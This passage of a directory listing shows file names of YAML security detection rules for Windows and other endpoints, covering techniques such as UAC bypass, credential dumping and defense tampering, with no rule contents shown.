│ ├── rundll32_process_creating_exe_dll_files.yml
│ ├── rundll32_shimcache_flush.yml
│ ├── rundll32_with_no_command_line_arguments_with_network.yml
│ ├── rundll_loading_dll_by_ordinal.yml
│ ├── ryuk_test_files_detected.yml
│ ├── ryuk_wake_on_lan_command.yml
│ ├── sam_database_file_access_attempt.yml
│ ├── samsam_test_file_write.yml
│ ├── sc_exe_manipulating_windows_services.yml
│ ├── schcache_change_by_app_connect_and_create_adsi_object.yml
│ ├── schedule_task_with_http_command_arguments.yml
│ ├── schedule_task_with_rundll32_command_trigger.yml
│ ├── scheduled_task_creation_on_remote_endpoint_using_at.yml
│ ├── scheduled_task_deleted_or_created_via_cmd.yml
│ ├── scheduled_task_initiation_on_remote_endpoint.yml
│ ├── schtasks_run_task_on_demand.yml
│ ├── schtasks_scheduling_job_on_remote_system.yml
│ ├── schtasks_used_for_forcing_a_reboot.yml
│ ├── screensaver_event_trigger_execution.yml
│ ├── script_execution_via_wmi.yml
│ ├── sdclt_uac_bypass.yml
│ ├── sdelete_application_execution.yml
│ ├── searchprotocolhost_with_no_command_line_with_network.yml
│ ├── secretdumps_offline_ntds_dumping_tool.yml
│ ├── serviceprincipalnames_discovery_with_powershell.yml
│ ├── serviceprincipalnames_discovery_with_setspn.yml
│ ├── services_escalate_exe.yml
│ ├── services_lolbas_execution_process_spawn.yml
│ ├── set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
│ ├── shim_database_file_creation.yml
│ ├── shim_database_installation_with_suspicious_parameters.yml
│ ├── short_lived_scheduled_task.yml
│ ├── short_lived_windows_accounts.yml
│ ├── silentcleanup_uac_bypass.yml
│ ├── single_letter_process_on_endpoint.yml
│ ├── slui_runas_elevated.yml
│ ├── slui_spawning_a_process.yml
│ ├── spike_in_file_writes.yml
│ ├── spoolsv_spawning_rundll32.yml
│ ├── spoolsv_suspicious_loaded_modules.yml
│ ├── spoolsv_suspicious_process_access.yml
│ ├── spoolsv_writing_a_dll.yml
│ ├── spoolsv_writing_a_dll___sysmon.yml
│ ├── sqlite_module_in_temp_folder.yml
│ ├── steal_or_forge_authentication_certificates_behavior_identified.yml
│ ├── sunburst_correlation_dll_and_network_event.yml
│ ├── suspicious_computer_account_name_change.yml
│ ├── suspicious_copy_on_system32.yml
│ ├── suspicious_curl_network_connection.yml
│ ├── suspicious_dllhost_no_command_line_arguments.yml
│ ├── suspicious_gpupdate_no_command_line_arguments.yml
│ ├── suspicious_icedid_rundll32_cmdline.yml
│ ├── suspicious_image_creation_in_appdata_folder.yml
│ ├── suspicious_kerberos_service_ticket_request.yml
│ ├── suspicious_linux_discovery_commands.yml
│ ├── suspicious_microsoft_workflow_compiler_rename.yml
│ ├── suspicious_microsoft_workflow_compiler_usage.yml
│ ├── suspicious_msbuild_path.yml
│ ├── suspicious_msbuild_rename.yml
│ ├── suspicious_msbuild_spawn.yml
│ ├── suspicious_mshta_child_process.yml
│ ├── suspicious_mshta_spawn.yml
│ ├── suspicious_plistbuddy_usage.yml
│ ├── suspicious_plistbuddy_usage_via_osquery.yml
│ ├── suspicious_process_executed_from_container_file.yml
│ ├── suspicious_reg_exe_process.yml
│ ├── suspicious_regsvr32_register_suspicious_path.yml
│ ├── suspicious_rundll32_dllregisterserver.yml
│ ├── suspicious_rundll32_no_command_line_arguments.yml
│ ├── suspicious_rundll32_plugininit.yml
│ ├── suspicious_rundll32_startw.yml
│ ├── suspicious_scheduled_task_from_public_directory.yml
│ ├── suspicious_searchprotocolhost_no_command_line_arguments.yml
│ ├── suspicious_sqlite3_lsquarantine_behavior.yml
│ ├── suspicious_ticket_granting_ticket_request.yml
│ ├── suspicious_wav_file_in_appdata_folder.yml
│ ├── suspicious_wevtutil_usage.yml
│ ├── suspicious_writes_to_windows_recycle_bin.yml
│ ├── svchost_lolbas_execution_process_spawn.yml
│ ├── system_info_gathering_using_dxdiag_application.yml
│ ├── system_information_discovery_detection.yml
│ ├── system_processes_run_from_unexpected_locations.yml
│ ├── system_user_discovery_with_query.yml
│ ├── system_user_discovery_with_whoami.yml
│ ├── time_provider_persistence_registry.yml
│ ├── trickbot_named_pipe.yml
│ ├── uac_bypass_mmc_load_unsigned_dll.yml
│ ├── uac_bypass_with_colorui_com_object.yml
│ ├── uninstall_app_using_msiexec.yml
│ ├── unknown_process_using_the_kerberos_protocol.yml
│ ├── unload_sysmon_filter_driver.yml
│ ├── unloading_amsi_via_reflection.yml
│ ├── unusual_number_of_computer_service_tickets_requested.yml
│ ├── unusual_number_of_kerberos_service_tickets_requested.yml
│ ├── unusual_number_of_remote_endpoint_authentication_events.yml
│ ├── unusually_long_command_line.yml
│ ├── unusually_long_command_line___mltk.yml
│ ├── user_discovery_with_env_vars_powershell.yml
│ ├── user_discovery_with_env_vars_powershell_script_block.yml
│ ├── usn_journal_deletion.yml
│ ├── vbscript_execution_using_wscript_app.yml
│ ├── verclsid_clsid_execution.yml
│ ├── w3wp_spawning_shell.yml
│ ├── wbadmin_delete_system_backups.yml
│ ├── wbemprox_com_object_execution.yml
│ ├── web_servers_executing_suspicious_processes.yml
│ ├── wermgr_process_create_executable_file.yml
│ ├── wermgr_process_spawned_cmd_or_powershell_process.yml
│ ├── wget_download_and_bash_execution.yml
│ ├── windows_access_token_manipulation_sedebugprivilege.yml
│ ├── windows_access_token_manipulation_winlogon_duplicate_token_handle.yml
│ ├── windows_access_token_winlogon_duplicate_handle_in_uncommon_path.yml
│ ├── windows_account_access_removal_via_logoff_exec.yml
│ ├── windows_account_discovery_for_none_disable_user_account.yml
│ ├── windows_account_discovery_for_sam_account_name.yml
│ ├── windows_account_discovery_with_netuser_preauthnotrequire.yml
│ ├── windows_ad_abnormal_object_access_activity.yml
│ ├── windows_ad_add_self_to_group.yml
│ ├── windows_ad_adminsdholder_acl_modified.yml
│ ├── windows_ad_cross_domain_sid_history_addition.yml
│ ├── windows_ad_dangerous_deny_acl_modification.yml
│ ├── windows_ad_dangerous_group_acl_modification.yml
│ ├── windows_ad_dangerous_user_acl_modification.yml
│ ├── windows_ad_dcshadow_privileges_acl_addition.yml
│ ├── windows_ad_domain_controller_audit_policy_disabled.yml
│ ├── windows_ad_domain_controller_promotion.yml
│ ├── windows_ad_domain_replication_acl_addition.yml
│ ├── windows_ad_domain_root_acl_deletion.yml
│ ├── windows_ad_domain_root_acl_modification.yml
│ ├── windows_ad_dsrm_account_changes.yml
│ ├── windows_ad_dsrm_password_reset.yml
│ ├── windows_ad_gpo_deleted.yml
│ ├── windows_ad_gpo_disabled.yml
│ ├── windows_ad_gpo_new_cse_addition.yml
│ ├── windows_ad_hidden_ou_creation.yml
│ ├── windows_ad_object_owner_updated.yml
│ ├── windows_ad_privileged_account_sid_history_addition.yml
│ ├── windows_ad_privileged_group_modification.yml
│ ├── windows_ad_privileged_object_access_activity.yml
│ ├── windows_ad_replication_request_initiated_by_user_account.yml
│ ├── windows_ad_replication_request_initiated_from_unsanctioned_location.yml
│ ├── windows_ad_same_domain_sid_history_addition.yml
│ ├── windows_ad_self_dacl_assignment.yml
│ ├── windows_ad_serviceprincipalname_added_to_domain_account.yml
│ ├── windows_ad_short_lived_domain_account_serviceprincipalname.yml
│ ├── windows_ad_short_lived_domain_controller_spn_attribute.yml
│ ├── windows_ad_short_lived_server_object.yml
│ ├── windows_ad_sid_history_attribute_modified.yml
│ ├── windows_ad_suspicious_attribute_modification.yml
│ ├── windows_ad_suspicious_gpo_modification.yml
│ ├── windows_adfind_exe.yml
│ ├── windows_admin_permission_discovery.yml
│ ├── windows_administrative_shares_accessed_on_multiple_hosts.yml
│ ├── windows_admon_default_group_policy_object_modified.yml
│ ├── windows_admon_group_policy_object_created.yml
│ ├── windows_alternate_datastream___base64_content.yml
│ ├── windows_alternate_datastream___executable_content.yml
│ ├── windows_alternate_datastream___process_execution.yml
│ ├── windows_anonymous_pipe_activity.yml
│ ├── windows_apache_benchmark_binary.yml
│ ├── windows_app_layer_protocol_qakbot_namedpipe.yml
│ ├── windows_app_layer_protocol_wermgr_connect_to_namedpipe.yml
│ ├── windows_application_layer_protocol_rms_radmin_tool_namedpipe.yml
│ ├── windows_applocker_block_events.yml
│ ├── windows_applocker_execution_from_uncommon_locations.yml
│ ├── windows_applocker_privilege_escalation_via_unauthorized_bypass.yml
│ ├── windows_applocker_rare_application_launch_detection.yml
│ ├── windows_archive_collected_data_via_powershell.yml
│ ├── windows_archive_collected_data_via_rar.yml
│ ├── windows_archived_collected_data_in_temp_folder.yml
│ ├── windows_attempt_to_stop_security_service.yml
│ ├── windows_audit_policy_auditing_option_disabled_via_auditpol.yml
│ ├── windows_audit_policy_auditing_option_modified___registry.yml
│ ├── windows_audit_policy_cleared_via_auditpol.yml
│ ├── windows_audit_policy_disabled_via_auditpol.yml
│ ├── windows_audit_policy_disabled_via_legacy_auditpol.yml
│ ├── windows_audit_policy_excluded_category_via_auditpol.yml
│ ├── windows_audit_policy_restored_via_auditpol.yml
│ ├── windows_audit_policy_security_descriptor_tampering_via_auditpol.yml
│ ├── windows_autoit3_execution.yml
│ ├── windows_autostart_execution_lsass_driver_registry_modification.yml
│ ├── windows_binary_proxy_execution_mavinject_dll_injection.yml
│ ├── windows_bitlocker_suspicious_command_usage.yml
│ ├── windows_bitlockertogo_process_execution.yml
│ ├── windows_bitlockertogo_with_network_activity.yml
│ ├── windows_boot_or_logon_autostart_execution_in_startup_folder.yml
│ ├── windows_bootloader_inventory.yml
│ ├── windows_bypass_uac_via_pkgmgr_tool.yml
│ ├── windows_cab_file_on_disk.yml
│ ├── windows_cached_domain_credentials_reg_query.yml
│ ├── windows_change_default_file_association_for_no_file_ext.yml
│ ├── windows_cisco_secure_endpoint_related_service_stopped.yml
│ ├── windows_cisco_secure_endpoint_stop_immunet_service_via_sfc.yml
│ ├── windows_cisco_secure_endpoint_unblock_file_via_sfc.yml
│ ├── windows_cisco_secure_endpoint_uninstall_immunet_service_via_sfc.yml
│ ├── windows_clipboard_data_via_get_clipboard.yml
│ ├── windows_cmdline_tool_execution_from_non_shell_process.yml
│ ├── windows_com_hijacking_inprocserver32_modification.yml
│ ├── windows_command_and_scripting_interpreter_hunting_path_traversal.yml
│ ├── windows_command_and_scripting_interpreter_path_traversal_exec.yml
│ ├── windows_command_shell_dcrat_forkbomb_payload.yml
│ ├── windows_common_abused_cmd_shell_risk_behavior.yml
│ ├── windows_compatibility_telemetry_suspicious_child_process.yml
│ ├── windows_compatibility_telemetry_tampering_through_registry.yml
│ ├── windows_computer_account_created_by_computer_account.yml
│ ├── windows_computer_account_requesting_kerberos_ticket.yml
│ ├── windows_computer_account_with_spn.yml
│ ├── windows_conhost_with_headless_argument.yml
│ ├── windows_consolehost_history_file_deletion.yml
│ ├── windows_create_local_account.yml
│ ├── windows_create_local_administrator_account_via_net.yml
│ ├── windows_credential_access_from_browser_password_store.yml
│ ├── windows_credential_dumping_lsass_memory_createdump.yml
│ ├── windows_credentials_access_via_vaultcli_module.yml
│ ├── windows_credentials_from_password_stores_chrome_copied_in_temp_dir.yml
│ ├── windows_credentials_from_password_stores_chrome_extension_access.yml
│ ├── windows_credentials_from_password_stores_chrome_localstate_access.yml
│ ├── windows_credentials_from_password_stores_chrome_login_data_access.yml
│ ├── windows_credentials_from_password_stores_creation.yml
│ ├── windows_credentials_from_password_stores_deletion.yml
│ ├── windows_credentials_from_password_stores_query.yml
│ ├── windows_credentials_from_web_browsers_saved_in_temp_folder.yml
│ ├── windows_credentials_in_registry_reg_query.yml
│ ├── windows_curl_download_to_suspicious_path.yml
│ ├── windows_curl_upload_to_remote_destination.yml
│ ├── windows_data_destruction_recursive_exec_files_deletion.yml
│ ├── windows_debugger_tool_execution.yml
│ ├── windows_defacement_modify_transcodedwallpaper_file.yml
│ ├── windows_default_group_policy_object_modified.yml
│ ├── windows_default_group_policy_object_modified_with_gpme.yml
│ ├── windows_defender_asr_audit_events.yml
│ ├── windows_defender_asr_block_events.yml
│ ├── windows_defender_asr_registry_modification.yml
│ ├── windows_defender_asr_rule_disabled.yml
│ ├── windows_defender_asr_rules_stacking.yml
│ ├── windows_defender_exclusion_registry_entry.yml
│ ├── windows_delete_or_modify_system_firewall.yml
│ ├── windows_deleted_registry_by_a_non_critical_process_file_path.yml
│ ├── windows_detect_network_scanner_behavior.yml
│ ├── windows_disable_change_password_through_registry.yml
│ ├── windows_disable_lock_workstation_feature_through_registry.yml
│ ├── windows_disable_logoff_button_through_registry.yml
│ ├── windows_disable_memory_crash_dump.yml
│ ├── windows_disable_notification_center.yml
│ ├── windows_disable_or_modify_tools_via_taskkill.yml
│ ├── windows_disable_or_stop_browser_process.yml
│ ├── windows_disable_shutdown_button_through_registry.yml
│ ├── windows_disable_windows_event_logging_disable_http_logging.yml
│ ├── windows_disable_windows_group_policy_features_through_registry.yml
│ ├── windows_disableantispyware_registry.yml
│ ├── windows_diskcryptor_usage.yml
│ ├── windows_diskshadow_proxy_execution.yml
│ ├── windows_dism_install_powershell_web_access.yml
│ ├── windows_dism_remove_defender.yml
│ ├── windows_dll_search_order_hijacking_hunt_with_sysmon.yml
│ ├── windows_dll_search_order_hijacking_with_iscsicpl.yml
│ ├── windows_dll_side_loading_in_calc.yml
│ ├── windows_dll_side_loading_process_child_of_calc.yml
│ ├── windows_dns_gather_network_info.yml
│ ├── windows_dnsadmins_new_member_added.yml
│ ├── windows_domain_account_discovery_via_get_netcomputer.yml
│ ├── windows_domain_admin_impersonation_indicator.yml
│ ├── windows_dotnet_binary_in_non_standard_path.yml
│ ├── windows_driver_inventory.yml
│ ├── windows_driver_load_non_standard_path.yml
│ ├── windows_drivers_loaded_by_signature.yml
│ ├── windows_enable_powershell_web_access.yml
│ ├── windows_enable_win32_scheduledjob_via_registry.yml
│ ├── windows_esx_admins_group_creation_security_event.yml
│ ├── windows_esx_admins_group_creation_via_net.yml
│ ├── windows_esx_admins_group_creation_via_powershell.yml
│ ├── windows_event_for_service_disabled.yml
│ ├── windows_event_log_cleared.yml
│ ├── windows_event_logging_service_has_shutdown.yml
│ ├── windows_event_triggered_image_file_execution_options_injection.yml
│ ├── windows_eventlog_cleared_via_wevtutil.yml
│ ├── windows_eventlog_recon_activity_using_log_query_utilities.yml
│ ├── windows_excessive_disabled_services_event.yml
│ ├── windows_excessive_service_stop_attempt.yml
│ ├── windows_excessive_usage_of_net_app.yml
│ ├── windows_executable_in_loaded_modules.yml
│ ├── windows_execute_arbitrary_commands_with_msdt.yml
│ ├── windows_exfiltration_over_c2_via_invoke_restmethod.yml
│ ├── windows_exfiltration_over_c2_via_powershell_uploadstring.yml
│ ├── windows_explorer_exe_spawning_powershell_or_cmd.yml
│ ├── windows_explorer_lnk_exploit_process_launch_with_padding.yml
│ ├── windows_export_certificate.yml
│ ├── windows_file_and_directory_enable_readonly_permissions.yml
│ ├── windows_file_and_directory_permissions_enable_inheritance.yml
│ ├── windows_file_and_directory_permissions_remove_inheritance.yml
│ ├── windows_file_download_via_certutil.yml
│ ├── windows_file_share_discovery_with_powerview.yml
│ ├── windows_file_transfer_protocol_in_non_common_process_path.yml
│ ├── windows_file_without_extension_in_critical_folder.yml
│ ├── windows_files_and_dirs_access_rights_modification_via_icacls.yml
│ ├── windows_find_domain_organizational_units_with_getdomainou.yml
│ ├── windows_find_interesting_acl_with_findinterestingdomainacl.yml
│ ├── windows_findstr_gpp_discovery.yml
│ ├── windows_firewall_rule_added.yml
│ ├── windows_firewall_rule_deletion.yml
│ ├── windows_firewall_rule_modification.yml
│ ├── windows_forest_discovery_with_getforestdomain.yml
│ ├── windows_gather_victim_host_information_camera.yml
│ ├── windows_gather_victim_identity_sam_info.yml
│ ├── windows_get_adcomputer_unconstrained_delegation_discovery.yml
│ ├── windows_get_local_admin_with_findlocaladminaccess.yml
│ ├── windows_global_object_access_audit_list_cleared_via_auditpol.yml
│ ├── windows_group_discovery_via_net.yml
│ ├── windows_group_policy_object_created.yml
│ ├── windows_hidden_schedule_task_settings.yml
│ ├── windows_hide_notification_features_through_registry.yml
│ ├── windows_high_file_deletion_frequency.yml
│ ├── windows_hijack_execution_flow_version_dll_side_load.yml
│ ├── windows_http_network_communication_from_msiexec.yml
│ ├── windows_hunting_system_account_targeting_lsass.yml
│ ├── windows_identify_powershell_web_access_iis_pool.yml
│ ├── windows_identify_protocol_handlers.yml
│ ├── windows_iis_components_add_new_module.yml
│ ├── windows_iis_components_get_webglobalmodule_module_query.yml
│ ├── windows_iis_components_module_failed_to_load.yml
│ ├── windows_iis_components_new_module_added.yml
│ ├── windows_impair_defense_add_xml_applocker_rules.yml
│ ├── windows_impair_defense_change_win_defender_health_check_intervals.yml
│ ├── windows_impair_defense_change_win_defender_quick_scan_interval.yml
│ ├── windows_impair_defense_change_win_defender_throttle_rate.yml
│ ├── windows_impair_defense_change_win_defender_tracing_level.yml
│ ├── windows_impair_defense_configure_app_install_control.yml
│ ├── windows_impair_defense_define_win_defender_threat_action.yml
│ ├── windows_impair_defense_delete_win_defender_context_menu.yml
│ ├── windows_impair_defense_delete_win_defender_profile_registry.yml
│ ├── windows_impair_defense_deny_security_software_with_applocker.yml
│ ├── windows_impair_defense_disable_controlled_folder_access.yml
│ ├── windows_impair_defense_disable_defender_firewall_and_network.yml
│ ├── windows_impair_defense_disable_defender_protocol_recognition.yml
│ ├── windows_impair_defense_disable_pua_protection.yml
│ ├── windows_impair_defense_disable_realtime_signature_delivery.yml
│ ├── windows_impair_defense_disable_web_evaluation.yml
│ ├── windows_impair_defense_disable_win_defender_app_guard.yml
│ ├── windows_impair_defense_disable_win_defender_compute_file_hashes.yml
│ ├── windows_impair_defense_disable_win_defender_gen_reports.yml
│ ├── windows_impair_defense_disable_win_defender_network_protection.yml
│ ├── windows_impair_defense_disable_win_defender_report_infection.yml
│ ├── windows_impair_defense_disable_win_defender_scan_on_update.yml
│ ├── windows_impair_defense_disable_win_defender_signature_retirement.yml
│ ├── windows_impair_defense_overide_win_defender_phishing_filter.yml
│ ├── windows_impair_defense_override_smartscreen_prompt.yml
│ ├── windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
│ ├── windows_impair_defenses_disable_auto_logger_session.yml
│ ├── windows_impair_defenses_disable_av_autostart_via_registry.yml
│ ├── windows_impair_defenses_disable_hvci.yml
│ ├── windows_impair_defenses_disable_win_defender_auto_logging.yml
│ ├── windows_important_audit_policy_disabled.yml
│ ├── windows_increase_in_group_or_object_modification_activity.yml
│ ├── windows_increase_in_user_modification_activity.yml
│ ├── windows_indicator_removal_via_rmdir.yml
│ ├── windows_indirect_command_execution_via_forfiles.yml
│ ├── windows_indirect_command_execution_via_pcalua.yml
│ ├── windows_indirect_command_execution_via_series_of_forfiles.yml
│ ├── windows_information_discovery_fsutil.yml
│ ├── windows_ingress_tool_transfer_using_explorer.yml
│ ├── windows_inprocserver32_new_outlook_form.yml
│ ├── windows_input_capture_using_credential_ui_dll.yml
│ ├── windows_installutil_credential_theft.yml
│ ├── windows_installutil_in_non_standard_path.yml
│ ├── windows_installutil_remote_network_connection.yml
│ ├── windows_installutil_uninstall_option.yml
│ ├── windows_installutil_uninstall_option_with_network.yml
│ ├── windows_installutil_url_in_command_line.yml
│ ├── windows_iso_lnk_file_creation.yml
│ ├── windows_java_spawning_shells.yml
│ ├── windows_kerberos_local_successful_logon.yml
│ ├── windows_known_abused_dll_created.yml
│ ├── windows_known_abused_dll_loaded_suspiciously.yml
│ ├── windows_known_graphicalproton_loaded_modules.yml
│ ├── windows_krbrelayup_service_creation.yml
│ ├── windows_large_number_of_computer_service_tickets_requested.yml
│ ├── windows_ldifde_directory_object_behavior.yml
│ ├── windows_linked_policies_in_adsi_discovery.yml
│ ├── windows_list_env_variables_via_set_command_from_uncommon_parent.yml
│ ├── windows_local_administrator_credential_stuffing.yml
│ ├── windows_lolbas_executed_as_renamed_file.yml
│ ├── windows_lolbas_executed_outside_expected_path.yml
│ ├── windows_lsa_secrets_nolmhash_registry.yml
│ ├── windows_mail_protocol_in_non_common_process_path.yml
│ ├── windows_mark_of_the_web_bypass.yml
│ ├── windows_masquerading_explorer_as_child_process.yml
│ ├── windows_masquerading_msdtc_process.yml
│ ├── windows_mimikatz_binary_execution.yml
│ ├── windows_mimikatz_crypto_export_file_extensions.yml
│ ├── windows_modify_registry_authenticationleveloverride.yml
│ ├── windows_modify_registry_auto_minor_updates.yml
│ ├── windows_modify_registry_auto_update_notif.yml
│ ├── windows_modify_registry_configure_bitlocker.yml
│ ├── windows_modify_registry_default_icon_setting.yml
│ ├── windows_modify_registry_delete_firewall_rules.yml
│ ├── windows_modify_registry_disable_rdp.yml
│ ├── windows_modify_registry_disable_restricted_admin.yml
│ ├── windows_modify_registry_disable_toast_notifications.yml
│ ├── windows_modify_registry_disable_win_defender_raw_write_notif.yml
│ ├── windows_modify_registry_disable_windefender_notifications.yml
│ ├── windows_modify_registry_disable_windows_security_center_notif.yml
│ ├── windows_modify_registry_disableremotedesktopantialias.yml
│ ├── windows_modify_registry_disablesecuritysettings.yml
│ ├── windows_modify_registry_disabling_wer_settings.yml
│ ├── windows_modify_registry_disallow_windows_app.yml
│ ├── windows_modify_registry_do_not_connect_to_win_update.yml
│ ├── windows_modify_registry_dontshowui.yml
│ ├── windows_modify_registry_enablelinkedconnections.yml
│ ├── windows_modify_registry_longpathsenabled.yml
│ ├── windows_modify_registry_maxconnectionperserver.yml
│ ├── windows_modify_registry_no_auto_reboot_with_logon_user.yml
│ ├── windows_modify_registry_no_auto_update.yml
│ ├── windows_modify_registry_nochangingwallpaper.yml
│ ├── windows_modify_registry_on_smart_card_group_policy.yml
│ ├── windows_modify_registry_proxyenable.yml
│ ├── windows_modify_registry_proxyserver.yml
│ ├── windows_modify_registry_qakbot_binary_data_registry.yml
│ ├── windows_modify_registry_regedit_silent_reg_import.yml
│ ├── windows_modify_registry_risk_behavior.yml
│ ├── windows_modify_registry_suppress_win_defender_notif.yml
│ ├── windows_modify_registry_tamper_protection.yml
│ ├── windows_modify_registry_to_add_or_modify_firewall_rule.yml
│ ├── windows_modify_registry_updateserviceurlalternate.yml
│ ├── windows_modify_registry_usewuserver.yml
│ ├── windows_modify_registry_utilize_progids.yml
│ ├── windows_modify_registry_valleyrat_c2_config.yml
│ ├── windows_modify_registry_valleyrat_pwn_reg_entry.yml
│ ├── windows_modify_registry_with_md5_reg_key_name.yml
│ ├── windows_modify_registry_wuserver.yml
│ ├── windows_modify_registry_wustatusserver.yml
│ ├── windows_modify_show_compress_color_and_info_tip_registry.yml
│ ├── windows_modify_system_firewall_with_notable_process_path.yml
│ ├── windows_mof_event_triggered_execution_via_wmi.yml
│ ├── windows_moveit_transfer_writing_aspx.yml
│ ├── windows_msc_eviltwin_directory_path_manipulation.yml
│ ├── windows_msexchange_management_mailbox_cmdlet_usage.yml
│ ├── windows_mshta_execution_in_registry.yml
│ ├── windows_mshta_writing_to_world_writable_path.yml
│ ├── windows_msiexec_dllregisterserver.yml
│ ├── windows_msiexec_hidewindow_rundll32_execution.yml
│ ├── windows_msiexec_remote_download.yml
│ ├── windows_msiexec_spawn_discovery_command.yml
│ ├── windows_msiexec_spawn_windbg.yml
│ ├── windows_msiexec_unregister_dllregisterserver.yml
│ ├── windows_mstsc_rdp_commandline.yml
│ ├── windows_multiple_account_passwords_changed.yml
│ ├── windows_multiple_accounts_deleted.yml
│ ├── windows_multiple_accounts_disabled.yml
│ ├── windows_multiple_disabled_users_failed_to_authenticate_wth_kerberos.yml
│ ├── windows_multiple_invalid_users_fail_to_authenticate_using_kerberos.yml
│ ├── windows_multiple_invalid_users_failed_to_authenticate_using_ntlm.yml
│ ├── windows_multiple_ntlm_null_domain_authentications.yml
│ ├── windows_multiple_users_fail_to_authenticate_wth_explicitcredentials.yml
│ ├── windows_multiple_users_failed_to_authenticate_from_host_using_ntlm.yml
│ ├── windows_multiple_users_failed_to_authenticate_from_process.yml
│ ├── windows_multiple_users_failed_to_authenticate_using_kerberos.yml
│ ├── windows_multiple_users_remotely_failed_to_authenticate_from_host.yml
│ ├── windows_network_connection_discovery_via_net.yml
│ ├── windows_network_share_interaction_via_net.yml
│ ├── windows_new_custom_security_descriptor_set_on_eventlog_channel.yml
│ ├── windows_new_default_file_association_value_set.yml
│ ├── windows_new_deny_permission_set_on_service_sd_via_sc_exe.yml
│ ├── windows_new_eventlog_channelaccess_registry_value_set.yml
│ ├── windows_new_inprocserver32_added.yml
│ ├── windows_new_service_security_descriptor_set_via_sc_exe.yml
│ ├── windows_ngrok_reverse_proxy_usage.yml
│ ├── windows_nirsoft_advancedrun.yml
│ ├── windows_nirsoft_utilities.yml
│ ├── windows_njrat_fileless_storage_via_registry.yml
│ ├── windows_non_discord_app_access_discord_leveldb.yml
│ ├── windows_non_system_account_targeting_lsass.yml
│ ├── windows_obfuscated_files_or_information_via_rar_sfx.yml
│ ├── windows_odbcconf_hunting.yml
│ ├── windows_odbcconf_load_dll.yml
│ ├── windows_odbcconf_load_response_file.yml
│ ├── windows_office_product_dropped_cab_or_inf_file.yml
│ ├── windows_office_product_dropped_uncommon_file.yml
│ ├── windows_office_product_loaded_mshtml_module.yml
│ ├── windows_office_product_loading_taskschd_dll.yml
│ ├── windows_office_product_loading_vbe7_dll.yml
│ ├── windows_office_product_spawned_child_process_for_download.yml
│ ├── windows_office_product_spawned_control.yml
│ ├── windows_office_product_spawned_msdt.yml
│ ├── windows_office_product_spawned_rundll32_with_no_dll.yml
│ ├── windows_office_product_spawned_uncommon_process.yml
│ ├── windows_outlook_webview_registry_modification.yml
│ ├── windows_papercut_ng_spawn_shell.yml
│ ├── windows_parent_pid_spoofing_with_explorer.yml
│ ├── windows_password_managers_discovery.yml
│ ├── windows_password_policy_discovery_with_net.yml
│ ├── windows_phishing_outlook_drop_dll_in_form_dir.yml
│ ├── windows_phishing_pdf_file_executes_url_link.yml
│ ├── windows_phishing_recent_iso_exec_registry.yml
│ ├── windows_possible_credential_dumping.yml
│ ├── windows_post_exploitation_risk_behavior.yml
│ ├── windows_powershell_add_module_to_global_assembly_cache.yml
│ ├── windows_powershell_cryptography_namespace.yml
│ ├── windows_powershell_disable_http_logging.yml
│ ├── windows_powershell_export_certificate.yml
│ ├── windows_powershell_export_pfxcertificate.yml
│ ├── windows_powershell_fakecaptcha_clipboard_execution.yml
│ ├── windows_powershell_get_ciminstance_remote_computer.yml
│ ├── windows_powershell_history_file_deletion.yml
│ ├── windows_powershell_iis_components_webglobalmodule_usage.yml
│ ├── windows_powershell_import_applocker_policy.yml
│ ├── windows_powershell_invoke_restmethod_ip_information_collection.yml
│ ├── windows_powershell_invoke_sqlcmd_execution.yml
│ ├── windows_powershell_logoff_user_via_quser.yml
│ ├── windows_powershell_process_with_malicious_string.yml
│ ├── windows_powershell_remotesigned_file.yml
│ ├── windows_powershell_scheduletask.yml
│ ├── windows_powershell_script_block_with_malicious_string.yml
│ ├── windows_powershell_wmi_win32_scheduledjob.yml
│ ├── windows_powersploit_gpp_discovery.yml
│ ├── windows_powerview_ad_access_control_list_enumeration.yml
│ ├── windows_powerview_constrained_delegation_discovery.yml
│ ├── windows_powerview_kerberos_service_ticket_request.yml
│ ├── windows_powerview_spn_discovery.yml
│ ├── windows_powerview_unconstrained_delegation_discovery.yml
│ ├── windows_private_keys_discovery.yml
│ ├── windows_privilege_escalation_suspicious_process_elevation.yml
│ ├── windows_privilege_escalation_system_process_without_system_parent.yml
│ ├── windows_privilege_escalation_user_process_spawn_system_process.yml
│ ├── windows_privileged_group_modification.yml
│ ├── windows_process_commandline_discovery.yml
│ ├── windows_process_executed_from_removable_media.yml
│ ├── windows_process_execution_from_programdata.yml
│ ├── windows_process_execution_in_temp_dir.yml
│ ├── windows_process_injection_in_non_service_searchindexer.yml
│ ├── windows_process_injection_into_commonly_abused_processes.yml
│ ├── windows_process_injection_into_notepad.yml
│ ├── windows_process_injection_of_wermgr_to_known_browser.yml
│ ├── windows_process_injection_remote_thread.yml
│ ├── windows_process_injection_wermgr_child_process.yml
│ ├── windows_process_injection_with_public_source_path.yml
│ ├── windows_process_with_namedpipe_commandline.yml
│ ├── windows_process_with_netexec_command_line_parameters.yml
│ ├── windows_process_writing_file_to_world_writable_path.yml
│ ├── windows_processes_killed_by_industroyer2_malware.yml
│ ├── windows_protocol_tunneling_with_plink.yml
│ ├── windows_proxy_via_netsh.yml
│ ├── windows_proxy_via_registry.yml
│ ├── windows_query_registry_browser_list_application.yml
│ ├── windows_query_registry_uninstall_program_list.yml
│ ├── windows_raccine_scheduled_task_deletion.yml
│ ├── windows_rapid_authentication_on_multiple_hosts.yml
│ ├── windows_rasautou_dll_execution.yml
│ ├── windows_raw_access_to_disk_volume_partition.yml
│ ├── windows_raw_access_to_master_boot_record_drive.yml
│ ├── windows_rdp_connection_successful.yml
│ ├── windows_rdp_file_execution.yml
│ ├── windows_rdpclient_connection_sequence_events.yml
│ ├── windows_registry_bootexecute_modification.yml
│ ├── windows_registry_certificate_added.yml
│ ├── windows_registry_delete_task_sd.yml
│ ├── windows_registry_dotnet_etw_disabled_via_env_variable.yml
│ ├── windows_registry_entries_exported_via_reg.yml
│ ├── windows_registry_entries_restored_via_reg.yml
│ ├── windows_registry_modification_for_safe_mode_persistence.yml
│ ├── windows_registry_payload_injection.yml
│ ├── windows_registry_sip_provider_modification.yml
│ ├── windows_regsvr32_renamed_binary.yml
│ ├── windows_remote_access_software_brc4_loaded_dll.yml
│ ├── windows_remote_access_software_rms_registry.yml
│ ├── windows_remote_assistance_spawning_process.yml
│ ├── windows_remote_create_service.yml
│ ├── windows_remote_host_computer_management_access.yml
│ ├── windows_remote_management_execute_shell.yml
│ ├── windows_remote_service_rdpwinst_tool_execution.yml
│ ├── windows_remote_services_allow_rdp_in_firewall.yml
